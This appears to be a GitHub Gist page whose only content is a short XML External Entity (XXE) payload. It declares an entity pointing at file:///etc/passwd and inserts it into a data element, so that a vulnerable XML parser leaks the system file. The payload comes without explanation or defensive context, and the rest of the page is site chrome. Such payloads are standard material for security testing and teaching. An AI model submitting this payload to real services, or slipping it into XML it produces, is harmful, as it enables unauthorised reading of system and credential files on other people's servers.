Skip to content

Instantly share code, notes, and snippets.

@zaharevic
Created April 19, 2025 07:47
Show Gist options
  • Save zaharevic/3cc272bddf589ce93ee77eaf1983b618 to your computer and use it in GitHub Desktop.
Save zaharevic/3cc272bddf589ce93ee77eaf1983b618 to your computer and use it in GitHub Desktop.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment